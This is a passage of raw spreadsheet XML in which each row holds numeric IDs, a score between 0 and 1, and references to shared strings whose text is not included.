      <c r="F7489" t="s">
        <v>13461</v>
      </c>
      <c r="G7489" t="s">
        <v>14817</v>
      </c>
      <c r="H7489" t="s">
        <v>14818</v>
      </c>
    </row>
    <row r="7490" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7490" s="1">
        <v>7488</v>
      </c>
      <c r="B7490">
        <v>4582</v>
      </c>
      <c r="C7490">
        <v>4582</v>
      </c>
      <c r="D7490">
        <v>4</v>
      </c>
      <c r="E7490">
        <v>0.98989999294281006</v>
      </c>
      <c r="F7490" t="s">
        <v>13461</v>
      </c>
      <c r="G7490" t="s">
        <v>14819</v>
      </c>
      <c r="H7490" t="s">
        <v>14820</v>
      </c>
    </row>
    <row r="7491" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7491" s="1">
        <v>7489</v>
      </c>
      <c r="B7491">
        <v>4593</v>
      </c>
      <c r="C7491">
        <v>4593</v>
      </c>
      <c r="D7491">
        <v>4</v>
      </c>
      <c r="E7491">
        <v>0.68949997425079346</v>
      </c>
      <c r="F7491" t="s">
        <v>13461</v>
      </c>
      <c r="G7491" t="s">
        <v>14821</v>
      </c>
      <c r="H7491" t="s">
        <v>14822</v>
      </c>
    </row>
    <row r="7492" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7492" s="1">
        <v>7490</v>
      </c>
      <c r="B7492">
        <v>4606</v>
      </c>
      <c r="C7492">
        <v>4606</v>
      </c>
      <c r="D7492">
        <v>4</v>
      </c>
      <c r="E7492">
        <v>0.9812999963760376</v>
      </c>
      <c r="F7492" t="s">
        <v>13461</v>
      </c>
      <c r="G7492" t="s">
        <v>14823</v>
      </c>
      <c r="H7492" t="s">
        <v>14824</v>
      </c>
    </row>
    <row r="7493" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7493" s="1">
        <v>7491</v>
      </c>
      <c r="B7493">
        <v>5949</v>
      </c>
      <c r="C7493">
        <v>5949</v>
      </c>
      <c r="D7493">
        <v>4</v>
      </c>
      <c r="E7493">
        <v>0.9814000129699707</v>
      </c>
      <c r="F7493" t="s">
        <v>13461</v>
      </c>
      <c r="G7493" t="s">
        <v>14825</v>
      </c>
      <c r="H7493" t="s">
        <v>14826</v>
      </c>
    </row>
    <row r="7494" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7494" s="1">
        <v>7492</v>
      </c>
      <c r="B7494">
        <v>4610</v>
      </c>
      <c r="C7494">
        <v>4610</v>
      </c>
      <c r="D7494">
        <v>4</v>
      </c>
      <c r="E7494">
        <v>0.49219998717308039</v>
      </c>
      <c r="F7494" t="s">
        <v>13461</v>
      </c>
      <c r="G7494" t="s">
        <v>14827</v>
      </c>
      <c r="H7494" t="s">
        <v>14828</v>
      </c>
    </row>
    <row r="7495" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7495" s="1">
        <v>7493</v>
      </c>
      <c r="B7495">
        <v>5946</v>
      </c>
      <c r="C7495">
        <v>5946</v>
      </c>
      <c r="D7495">
        <v>4</v>
      </c>
      <c r="E7495">
        <v>0.80870002508163452</v>
      </c>
      <c r="F7495" t="s">
        <v>13461</v>
      </c>
      <c r="G7495" t="s">
        <v>14829</v>
      </c>
      <c r="H7495" t="s">
        <v>14830</v>
      </c>
    </row>
    <row r="7496" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7496" s="1">
        <v>7494</v>
      </c>
      <c r="B7496">
        <v>4613</v>
      </c>
      <c r="C7496">
        <v>4613</v>
      </c>
      <c r="D7496">
        <v>4</v>
      </c>
      <c r="E7496">
        <v>0.99390000104904175</v>
      </c>
      <c r="F7496" t="s">
        <v>13461</v>
      </c>
      <c r="G7496" t="s">
        <v>14831</v>
      </c>
      <c r="H7496" t="s">
        <v>14832</v>
      </c>
    </row>
    <row r="7497" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7497" s="1">
        <v>7495</v>
      </c>
      <c r="B7497">
        <v>4616</v>
      </c>
      <c r="C7497">
        <v>4616</v>
      </c>
      <c r="D7497">
        <v>4</v>
      </c>
      <c r="E7497">
        <v>0.52270001173019409</v>
      </c>
      <c r="F7497" t="s">
        <v>13461</v>
      </c>
      <c r="G7497" t="s">
        <v>14833</v>
      </c>
      <c r="H7497" t="s">
        <v>14834</v>
      </c>
    </row>
    <row r="7498" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7498" s="1">
        <v>7496</v>
      </c>
      <c r="B7498">
        <v>4619</v>
      </c>
      <c r="C7498">
        <v>4619</v>
      </c>
      <c r="D7498">
        <v>4</v>
      </c>
      <c r="E7498">
        <v>0.98170000314712524</v>
      </c>
      <c r="F7498" t="s">
        <v>13461</v>
      </c>
      <c r="G7498" t="s">
        <v>14835</v>
      </c>
      <c r="H7498" t="s">
        <v>14836</v>
      </c>
    </row>
    <row r="7499" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7499" s="1">
        <v>7497</v>
      </c>
      <c r="B7499">
        <v>4581</v>
      </c>
      <c r="C7499">
        <v>4581</v>
      </c>
      <c r="D7499">
        <v>4</v>
      </c>
      <c r="E7499">
        <v>0.50029999017715454</v>
      </c>
      <c r="F7499" t="s">
        <v>13461</v>
      </c>
      <c r="G7499" t="s">
        <v>14837</v>
      </c>
      <c r="H7499" t="s">
        <v>14838</v>
      </c>
    </row>
    <row r="7500" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7500" s="1">
        <v>7498</v>
      </c>
      <c r="B7500">
        <v>5790</v>
      </c>
      <c r="C7500">
        <v>5790</v>
      </c>
      <c r="D7500">
        <v>4</v>
      </c>
      <c r="E7500">
        <v>0.78949999809265137</v>
      </c>
      <c r="F7500" t="s">
        <v>13461</v>
      </c>
      <c r="G7500" t="s">
        <v>14839</v>
      </c>
      <c r="H7500" t="s">
        <v>14840</v>
      </c>
    </row>
    <row r="7501" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7501" s="1">
        <v>7499</v>
      </c>
      <c r="B7501">
        <v>4785</v>
      </c>
      <c r="C7501">
        <v>4785</v>
      </c>
      <c r="D7501">
        <v>4</v>
      </c>
      <c r="E7501">
        <v>0.892799973487854</v>
      </c>
      <c r="F7501" t="s">
        <v>13461</v>
      </c>
      <c r="G7501" t="s">
        <v>14841</v>
      </c>
      <c r="H7501" t="s">
        <v>14842</v>
      </c>
    </row>
    <row r="7502" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7502" s="1">
        <v>7500</v>
      </c>
      <c r="B7502">
        <v>4819</v>
      </c>
      <c r="C7502">
        <v>4819</v>
      </c>
      <c r="D7502">
        <v>4</v>
      </c>
      <c r="E7502">
        <v>0.95590001344680786</v>
      </c>
      <c r="F7502" t="s">
        <v>13461</v>
      </c>
      <c r="G7502" t="s">
        <v>14843</v>
      </c>
      <c r="H7502" t="s">
        <v>14844</v>
      </c>
    </row>
    <row r="7503" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7503" s="1">
        <v>7501</v>
      </c>
      <c r="B7503">
        <v>4931</v>
      </c>
      <c r="C7503">
        <v>4931</v>
      </c>
      <c r="D7503">
        <v>4</v>
      </c>
      <c r="E7503">
        <v>0.8125</v>
      </c>
      <c r="F7503" t="s">
        <v>13461</v>
      </c>
      <c r="G7503" t="s">
        <v>14845</v>
      </c>
      <c r="H7503" t="s">
        <v>14846</v>
      </c>
    </row>
    <row r="7504" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7504" s="1">
        <v>7502</v>
      </c>
      <c r="B7504">
        <v>4934</v>
      </c>
      <c r="C7504">
        <v>4934</v>
      </c>
      <c r="D7504">
        <v>4</v>
      </c>
      <c r="E7504">
        <v>0.49860000610351563</v>
      </c>
      <c r="F7504" t="s">
        <v>13461</v>
      </c>
      <c r="G7504" t="s">
        <v>14847</v>
      </c>
      <c r="H7504" t="s">
        <v>14848</v>
      </c>
    </row>
    <row r="7505" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7505" s="1">
        <v>7503</v>
      </c>
      <c r="B7505">
        <v>4935</v>
      </c>
      <c r="C7505">
        <v>4935</v>
      </c>
      <c r="D7505">
        <v>4</v>
      </c>
      <c r="E7505">
        <v>0.94349998235702515</v>
      </c>
      <c r="F7505" t="s">
        <v>13461</v>
      </c>
      <c r="G7505" t="s">
        <v>14849</v>
      </c>
      <c r="H7505" t="s">
        <v>14850</v>
      </c>
    </row>
    <row r="7506" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7506" s="1">
        <v>7504</v>
      </c>
      <c r="B7506">
        <v>4941</v>
      </c>
      <c r="C7506">
        <v>4941</v>
      </c>
      <c r="D7506">
        <v>4</v>
      </c>
      <c r="E7506">
        <v>0.83560001850128174</v>
      </c>
      <c r="F7506" t="s">
        <v>13461</v>
      </c>
      <c r="G7506" t="s">
        <v>14851</v>
      </c>
      <c r="H7506" t="s">
        <v>14852</v>
      </c>
    </row>
    <row r="7507" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7507" s="1">
        <v>7505</v>
      </c>
      <c r="B7507">
        <v>4946</v>
      </c>
      <c r="C7507">
        <v>4946</v>
      </c>
      <c r="D7507">
        <v>4</v>
      </c>
      <c r="E7507">
        <v>0.98860001564025879</v>
      </c>
      <c r="F7507" t="s">
        <v>13461</v>
      </c>
      <c r="G7507" t="s">
        <v>14853</v>
      </c>
      <c r="H7507" t="s">
        <v>14854</v>
      </c>
    </row>
    <row r="7508" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7508" s="1">
        <v>7506</v>
      </c>
      <c r="B7508">
        <v>4948</v>
      </c>
      <c r="C7508">
        <v>4948</v>
      </c>
      <c r="D7508">
        <v>4</v>
      </c>
      <c r="E7508">
        <v>0.99900001287460327</v>
      </c>
      <c r="F7508" t="s">
        <v>13461</v>
      </c>
      <c r="G7508" t="s">
        <v>14855</v>
      </c>
      <c r="H7508" t="s">
        <v>14856</v>
      </c>
    </row>
    <row r="7509" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7509" s="1">
        <v>7507</v>
      </c>
      <c r="B7509">
        <v>5823</v>
      </c>
      <c r="C7509">
        <v>5823</v>
      </c>
      <c r="D7509">
        <v>4</v>
      </c>
      <c r="E7509">
        <v>0.90939998626708984</v>
      </c>
      <c r="F7509" t="s">
        <v>13461</v>
      </c>
      <c r="G7509" t="s">
        <v>14857</v>
      </c>
      <c r="H7509" t="s">
        <v>14858</v>
      </c>
    </row>
    <row r="7510" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7510" s="1">
        <v>7508</v>
      </c>
      <c r="B7510">
        <v>4951</v>
      </c>
      <c r="C7510">
        <v>4951</v>
      </c>
      <c r="D7510">
        <v>4</v>
      </c>
      <c r="E7510">
        <v>0.99260002374649048</v>
      </c>
      <c r="F7510" t="s">
        <v>13461</v>
      </c>
      <c r="G7510" t="s">
        <v>14859</v>
      </c>
      <c r="H7510" t="s">
        <v>14860</v>
      </c>
    </row>
    <row r="7511" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7511" s="1">
        <v>7509</v>
      </c>
      <c r="B7511">
        <v>5818</v>
      </c>
      <c r="C7511">
        <v>5818</v>
      </c>
      <c r="D7511">
        <v>4</v>
      </c>
      <c r="E7511">
        <v>0.99510002136230469</v>
      </c>
      <c r="F7511" t="s">
        <v>13461</v>
      </c>
      <c r="G7511" t="s">
        <v>14861</v>
      </c>
      <c r="H7511" t="s">
        <v>14862</v>
      </c>
    </row>
    <row r="7512" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7512" s="1">
        <v>7510</v>
      </c>
      <c r="B7512">
        <v>5833</v>
      </c>
      <c r="C7512">
        <v>5833</v>
      </c>
      <c r="D7512">
        <v>4</v>
      </c>
      <c r="E7512">
        <v>0.9747999906539917</v>
      </c>
      <c r="F7512" t="s">
        <v>13461</v>
      </c>
      <c r="G7512" t="s">
        <v>14863</v>
      </c>
      <c r="H7512" t="s">
        <v>14864</v>
      </c>
    </row>
    <row r="7513" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7513" s="1">
        <v>7511</v>
      </c>
      <c r="B7513">
        <v>4968</v>
      </c>
      <c r="C7513">
        <v>4968</v>
      </c>
      <c r="D7513">
        <v>4</v>
      </c>
      <c r="E7513">
        <v>0.99580001831054688</v>
      </c>
      <c r="F7513" t="s">
        <v>13461</v>
      </c>
      <c r="G7513" t="s">
        <v>14865</v>
      </c>
      <c r="H7513" t="s">
        <v>14866</v>
      </c>
    </row>
    <row r="7514" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7514" s="1">
        <v>7512</v>
      </c>
      <c r="B7514">
        <v>4979</v>
      </c>
      <c r="C7514">
        <v>4979</v>
      </c>
      <c r="D7514">
        <v>4</v>
      </c>
      <c r="E7514">
        <v>0.99620002508163452</v>
      </c>
      <c r="F7514" t="s">
        <v>13461</v>
      </c>
      <c r="G7514" t="s">
        <v>14867</v>
      </c>
      <c r="H7514" t="s">
        <v>14868</v>
      </c>
    </row>
    <row r="7515" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7515" s="1">
        <v>7513</v>
      </c>
      <c r="B7515">
        <v>4987</v>
      </c>
      <c r="C7515">
        <v>4987</v>
      </c>
      <c r="D7515">
        <v>4</v>
      </c>
      <c r="E7515">
        <v>0.96719998121261597</v>
      </c>
      <c r="F7515" t="s">
        <v>13461</v>
      </c>
      <c r="G7515" t="s">
        <v>14869</v>
      </c>
      <c r="H7515" t="s">
        <v>14870</v>
      </c>
    </row>
    <row r="7516" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7516" s="1">
        <v>7514</v>
      </c>
      <c r="B7516">
        <v>4992</v>
      </c>
      <c r="C7516">
        <v>4992</v>
      </c>
      <c r="D7516">
        <v>4</v>
      </c>
      <c r="E7516">
        <v>0.45339998602867132</v>
      </c>
      <c r="F7516" t="s">
        <v>13461</v>
      </c>
      <c r="G7516" t="s">
        <v>14871</v>
      </c>
      <c r="H7516" t="s">
        <v>13772</v>
      </c>
    </row>
    <row r="7517" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7517" s="1">
        <v>7515</v>
      </c>
      <c r="B7517">
        <v>5007</v>
      </c>
      <c r="C7517">
        <v>5007</v>
      </c>
      <c r="D7517">
        <v>4</v>
      </c>
      <c r="E7517">
        <v>0.82709997892379761</v>
      </c>
      <c r="F7517" t="s">
        <v>13461</v>
      </c>
      <c r="G7517" t="s">
        <v>14872</v>
      </c>
      <c r="H7517" t="s">
        <v>14873</v>
      </c>
    </row>
    <row r="7518" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7518" s="1">
        <v>7516</v>
      </c>
      <c r="B7518">
        <v>5010</v>
      </c>
      <c r="C7518">
        <v>5010</v>
      </c>
      <c r="D7518">
        <v>4</v>
      </c>
      <c r="E7518">
        <v>0.91269999742507935</v>
      </c>
      <c r="F7518" t="s">
        <v>13461</v>
      </c>
      <c r="G7518" t="s">
        <v>14874</v>
      </c>
      <c r="H7518" t="s">
        <v>14875</v>
      </c>
    </row>
    <row r="7519" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7519" s="1">
        <v>7517</v>
      </c>
      <c r="B7519">
        <v>5012</v>
      </c>
      <c r="C7519">
        <v>5012</v>
      </c>
      <c r="D7519">
        <v>4</v>
      </c>
      <c r="E7519">
        <v>0.74529999494552612</v>
      </c>
      <c r="F7519" t="s">
        <v>13461</v>
      </c>
      <c r="G7519" t="s">
        <v>14876</v>
      </c>
      <c r="H7519" t="s">
        <v>14877</v>
      </c>
    </row>
    <row r="7520" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7520" s="1">
        <v>7518</v>
      </c>
      <c r="B7520">
        <v>5034</v>
      </c>
      <c r="C7520">
        <v>5034</v>
      </c>
      <c r="D7520">
        <v>4</v>
      </c>
      <c r="E7520">
        <v>0.90920001268386841</v>
      </c>
      <c r="F7520" t="s">
        <v>13461</v>
      </c>
      <c r="G7520" t="s">
        <v>14878</v>
      </c>
      <c r="H7520" t="s">
        <v>14879</v>
      </c>
    </row>
    <row r="7521" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7521" s="1">
        <v>7519</v>
      </c>
      <c r="B7521">
        <v>5045</v>
      </c>
      <c r="C7521">
        <v>5045</v>
      </c>
      <c r="D7521">
        <v>4</v>
      </c>
      <c r="E7521">
        <v>0.94739997386932373</v>
      </c>
      <c r="F7521" t="s">
        <v>13461</v>
      </c>
      <c r="G7521" t="s">
        <v>14880</v>
      </c>
      <c r="H7521" t="s">
        <v>14881</v>
      </c>
    </row>
    <row r="7522" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7522" s="1">
        <v>7520</v>
      </c>
      <c r="B7522">
        <v>5046</v>
      </c>
      <c r="C7522">
        <v>5046</v>
      </c>
      <c r="D7522">
        <v>4</v>
      </c>
      <c r="E7522">
        <v>0.66060000658035278</v>
      </c>
      <c r="F7522" t="s">
        <v>13461</v>
      </c>
      <c r="G7522" t="s">
        <v>14882</v>
      </c>
      <c r="H7522" t="s">
        <v>14883</v>
      </c>
    </row>
    <row r="7523" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7523" s="1">
        <v>7521</v>
      </c>
      <c r="B7523">
        <v>4973</v>
      </c>
      <c r="C7523">
        <v>4973</v>
      </c>
      <c r="D7523">
        <v>4</v>
      </c>
      <c r="E7523">
        <v>0.41960000991821289</v>
      </c>
      <c r="F7523" t="s">
        <v>13461</v>
      </c>
      <c r="G7523" t="s">
        <v>14884</v>
      </c>
      <c r="H7523" t="s">
        <v>14885</v>
      </c>
    </row>
    <row r="7524" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7524" s="1">
        <v>7522</v>
      </c>
      <c r="B7524">
        <v>4818</v>
      </c>
      <c r="C7524">
        <v>4818</v>
      </c>
      <c r="D7524">
        <v>4</v>
      </c>
      <c r="E7524">
        <v>0.85790002346038818</v>
      </c>
      <c r="F7524" t="s">
        <v>13461</v>
      </c>
      <c r="G7524" t="s">
        <v>14886</v>
      </c>
      <c r="H7524" t="s">
        <v>14887</v>
      </c>
    </row>
    <row r="7525" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7525" s="1">
        <v>7523</v>
      </c>
      <c r="B7525">
        <v>4925</v>
      </c>
      <c r="C7525">
        <v>4925</v>
      </c>
      <c r="D7525">
        <v>4</v>
      </c>
      <c r="E7525">
        <v>0.99769997596740723</v>
      </c>
      <c r="F7525" t="s">
        <v>13461</v>
      </c>
      <c r="G7525" t="s">
        <v>14888</v>
      </c>
      <c r="H7525" t="s">
        <v>14889</v>
      </c>
    </row>
    <row r="7526" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7526" s="1">
        <v>7524</v>
      </c>
      <c r="B7526">
        <v>4908</v>
      </c>
      <c r="C7526">
        <v>4908</v>
      </c>
      <c r="D7526">
        <v>4</v>
      </c>
      <c r="E7526">
        <v>0.99629998207092285</v>
      </c>
      <c r="F7526" t="s">
        <v>13461</v>
      </c>
      <c r="G7526" t="s">
        <v>14890</v>
      </c>
      <c r="H7526" t="s">
        <v>14891</v>
      </c>
    </row>
    <row r="7527" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7527" s="1">
        <v>7525</v>
      </c>
      <c r="B7527">
        <v>4821</v>
      </c>
      <c r="C7527">
        <v>4821</v>
      </c>
      <c r="D7527">
        <v>4</v>
      </c>
      <c r="E7527">
        <v>0.78320002555847168</v>
      </c>
      <c r="F7527" t="s">
        <v>13461</v>
      </c>
      <c r="G7527" t="s">
        <v>14892</v>
      </c>
      <c r="H7527" t="s">
        <v>14893</v>
      </c>
    </row>
    <row r="7528" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7528" s="1">
        <v>7526</v>
      </c>
      <c r="B7528">
        <v>5891</v>
      </c>
      <c r="C7528">
        <v>5891</v>
      </c>
      <c r="D7528">
        <v>4</v>
      </c>
      <c r="E7528">
        <v>0.69230002164840698</v>
      </c>
      <c r="F7528" t="s">
        <v>13461</v>
      </c>
      <c r="G7528" t="s">
        <v>14894</v>
      </c>
      <c r="H7528" t="s">
        <v>14895</v>
      </c>
    </row>
    <row r="7529" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7529" s="1">
        <v>7527</v>
      </c>
      <c r="B7529">
        <v>4825</v>
      </c>
      <c r="C7529">
        <v>4825</v>
      </c>
      <c r="D7529">
        <v>4</v>
      </c>
      <c r="E7529">
        <v>0.92199999094009399</v>
      </c>
      <c r="F7529" t="s">
        <v>13461</v>
      </c>
      <c r="G7529" t="s">
        <v>14896</v>
      </c>
      <c r="H7529" t="s">
        <v>14897</v>
      </c>
    </row>
    <row r="7530" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7530" s="1">
        <v>7528</v>
      </c>
      <c r="B7530">
        <v>5886</v>
      </c>
      <c r="C7530">
        <v>5886</v>
      </c>
      <c r="D7530">
        <v>4</v>
      </c>
      <c r="E7530">
        <v>0.9090999960899353</v>
      </c>
      <c r="F7530" t="s">
        <v>13461</v>
      </c>
      <c r="G7530" t="s">
        <v>14898</v>
      </c>
      <c r="H7530" t="s">
        <v>14899</v>
      </c>
    </row>
    <row r="7531" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7531" s="1">
        <v>7529</v>
      </c>
      <c r="B7531">
        <v>4828</v>
      </c>
      <c r="C7531">
        <v>4828</v>
      </c>
      <c r="D7531">
        <v>4</v>
      </c>
      <c r="E7531">
        <v>0.90679997205734253</v>
      </c>
      <c r="F7531" t="s">
        <v>13461</v>
      </c>
      <c r="G7531" t="s">
        <v>14900</v>
      </c>
      <c r="H7531" t="s">
        <v>14901</v>
      </c>
    </row>
    <row r="7532" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7532" s="1">
        <v>7530</v>
      </c>
      <c r="B7532">
        <v>4829</v>
      </c>
      <c r="C7532">
        <v>4829</v>
      </c>
      <c r="D7532">
        <v>4</v>
      </c>
      <c r="E7532">
        <v>0.47729998826980591</v>
      </c>
      <c r="F7532" t="s">
        <v>13461</v>
      </c>
      <c r="G7532" t="s">
        <v>14902</v>
      </c>
      <c r="H7532" t="s">
        <v>14903</v>
      </c>
    </row>
    <row r="7533" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7533" s="1">
        <v>7531</v>
      </c>
      <c r="B7533">
        <v>4830</v>
      </c>
      <c r="C7533">
        <v>4830</v>
      </c>
      <c r="D7533">
        <v>4</v>
      </c>
      <c r="E7533">
        <v>0.95029997825622559</v>
      </c>
      <c r="F7533" t="s">
        <v>13461</v>
      </c>
      <c r="G7533" t="s">
        <v>14904</v>
      </c>
      <c r="H7533" t="s">
        <v>14905</v>
      </c>
    </row>
    <row r="7534" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7534" s="1">
        <v>7532</v>
      </c>
      <c r="B7534">
        <v>4841</v>
      </c>
      <c r="C7534">
        <v>4841</v>
      </c>
      <c r="D7534">
        <v>4</v>
      </c>
      <c r="E7534">
        <v>0.69849997758865356</v>
      </c>
      <c r="F7534" t="s">
        <v>13461</v>
      </c>
      <c r="G7534" t="s">
        <v>14906</v>
      </c>
      <c r="H7534" t="s">
        <v>14907</v>
      </c>
    </row>
    <row r="7535" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7535" s="1">
        <v>7533</v>
      </c>
      <c r="B7535">
        <v>5878</v>
      </c>
      <c r="C7535">
        <v>5878</v>
      </c>
      <c r="D7535">
        <v>4</v>
      </c>
      <c r="E7535">
        <v>0.7817000150680542</v>
      </c>
      <c r="F7535" t="s">
        <v>13461</v>
      </c>
      <c r="G7535" t="s">
        <v>14908</v>
      </c>
      <c r="H7535" t="s">
        <v>14909</v>
      </c>
    </row>
    <row r="7536" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7536" s="1">
        <v>7534</v>
      </c>
      <c r="B7536">
        <v>4919</v>
      </c>
      <c r="C7536">
        <v>4919</v>
      </c>
      <c r="D7536">
        <v>4</v>
      </c>
      <c r="E7536">
        <v>0.54869997501373291</v>
      </c>
      <c r="F7536" t="s">
        <v>13461</v>
      </c>
      <c r="G7536" t="s">
        <v>14910</v>
      </c>
      <c r="H7536" t="s">
        <v>14911</v>
      </c>
    </row>
    <row r="7537" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7537" s="1">
        <v>7535</v>
      </c>
      <c r="B7537">
        <v>5877</v>
      </c>
      <c r="C7537">
        <v>5877</v>
      </c>
      <c r="D7537">
        <v>4</v>
      </c>
      <c r="E7537">
        <v>0.37419998645782471</v>
      </c>
      <c r="F7537" t="s">
        <v>13461</v>
      </c>
      <c r="G7537" t="s">
        <v>14912</v>
      </c>
      <c r="H7537" t="s">
        <v>14913</v>
      </c>
    </row>
    <row r="7538" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7538" s="1">
        <v>7536</v>
      </c>
      <c r="B7538">
        <v>5875</v>
      </c>
      <c r="C7538">
        <v>5875</v>
      </c>
      <c r="D7538">
        <v>4</v>
      </c>
      <c r="E7538">
        <v>0.50669997930526733</v>
      </c>
      <c r="F7538" t="s">
        <v>13461</v>
      </c>
      <c r="G7538" t="s">
        <v>14914</v>
      </c>
      <c r="H7538" t="s">
        <v>14915</v>
      </c>
    </row>
    <row r="7539" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7539" s="1">
        <v>7537</v>
      </c>
      <c r="B7539">
        <v>4856</v>
      </c>
      <c r="C7539">
        <v>4856</v>
      </c>
      <c r="D7539">
        <v>4</v>
      </c>
      <c r="E7539">
        <v>0.51910001039505005</v>
      </c>
      <c r="F7539" t="s">
        <v>13461</v>
      </c>
      <c r="G7539" t="s">
        <v>14916</v>
      </c>
      <c r="H7539" t="s">
        <v>14917</v>
      </c>
    </row>
    <row r="7540" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7540" s="1">
        <v>7538</v>
      </c>
      <c r="B7540">
        <v>4863</v>
      </c>
      <c r="C7540">
        <v>4863</v>
      </c>
      <c r="D7540">
        <v>4</v>
      </c>
      <c r="E7540">
        <v>0.63559997081756592</v>
      </c>
      <c r="F7540" t="s">
        <v>13461</v>
      </c>
      <c r="G7540" t="s">
        <v>14918</v>
      </c>
      <c r="H7540" t="s">
        <v>14919</v>
      </c>
    </row>
    <row r="7541" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7541" s="1">
        <v>7539</v>
      </c>
      <c r="B7541">
        <v>4870</v>
      </c>
      <c r="C7541">
        <v>4870</v>
      </c>
      <c r="D7541">
        <v>4</v>
      </c>
      <c r="E7541">
        <v>0.8125</v>
      </c>
      <c r="F7541" t="s">
        <v>13461</v>
      </c>
      <c r="G7541" t="s">
        <v>14920</v>
      </c>
      <c r="H7541" t="s">
        <v>14921</v>
      </c>
    </row>
    <row r="7542" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7542" s="1">
        <v>7540</v>
      </c>
      <c r="B7542">
        <v>4873</v>
      </c>
      <c r="C7542">
        <v>4873</v>
      </c>
      <c r="D7542">
        <v>4</v>
      </c>
      <c r="E7542">
        <v>0.87290000915527344</v>
      </c>
      <c r="F7542" t="s">
        <v>13461</v>
      </c>
      <c r="G7542" t="s">
        <v>14922</v>
      </c>
      <c r="H7542" t="s">
        <v>14923</v>
      </c>
    </row>
    <row r="7543" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7543" s="1">
        <v>7541</v>
      </c>
      <c r="B7543">
        <v>4878</v>
      </c>
      <c r="C7543">
        <v>4878</v>
      </c>
      <c r="D7543">
        <v>4</v>
      </c>
      <c r="E7543">
        <v>0.98729997873306274</v>
      </c>
      <c r="F7543" t="s">
        <v>13461</v>
      </c>
      <c r="G7543" t="s">
        <v>14924</v>
      </c>
      <c r="H7543" t="s">
        <v>14925</v>
      </c>
    </row>
    <row r="7544" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7544" s="1">
        <v>7542</v>
      </c>
      <c r="B7544">
        <v>4888</v>
      </c>
      <c r="C7544">
        <v>4888</v>
      </c>
      <c r="D7544">
        <v>4</v>
      </c>
      <c r="E7544">
        <v>0.88169997930526733</v>
      </c>
      <c r="F7544" t="s">
        <v>13461</v>
      </c>
      <c r="G7544" t="s">
        <v>14926</v>
      </c>
      <c r="H7544" t="s">
        <v>14927</v>
      </c>
    </row>
    <row r="7545" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7545" s="1">
        <v>7543</v>
      </c>
      <c r="B7545">
        <v>4905</v>
      </c>
      <c r="C7545">
        <v>4905</v>
      </c>
      <c r="D7545">
        <v>4</v>
      </c>
      <c r="E7545">
        <v>0.51990002393722534</v>
      </c>
      <c r="F7545" t="s">
        <v>13461</v>
      </c>
      <c r="G7545" t="s">
        <v>14928</v>
      </c>
      <c r="H7545" t="s">
        <v>14929</v>
      </c>
    </row>
    <row r="7546" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7546" s="1">
        <v>7544</v>
      </c>
      <c r="B7546">
        <v>4906</v>
      </c>
      <c r="C7546">
        <v>4906</v>
      </c>
      <c r="D7546">
        <v>4</v>
      </c>
      <c r="E7546">
        <v>0.84710001945495605</v>
      </c>
      <c r="F7546" t="s">
        <v>13461</v>
      </c>
      <c r="G7546" t="s">
        <v>14930</v>
      </c>
      <c r="H7546" t="s">
        <v>14931</v>
      </c>
    </row>
    <row r="7547" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7547" s="1">
        <v>7545</v>
      </c>
      <c r="B7547">
        <v>4846</v>
      </c>
      <c r="C7547">
        <v>4846</v>
      </c>
      <c r="D7547">
        <v>4</v>
      </c>
      <c r="E7547">
        <v>0.8870999813079834</v>
      </c>
      <c r="F7547" t="s">
        <v>13461</v>
      </c>
      <c r="G7547" t="s">
        <v>14932</v>
      </c>
      <c r="H7547" t="s">
        <v>14933</v>
      </c>
    </row>
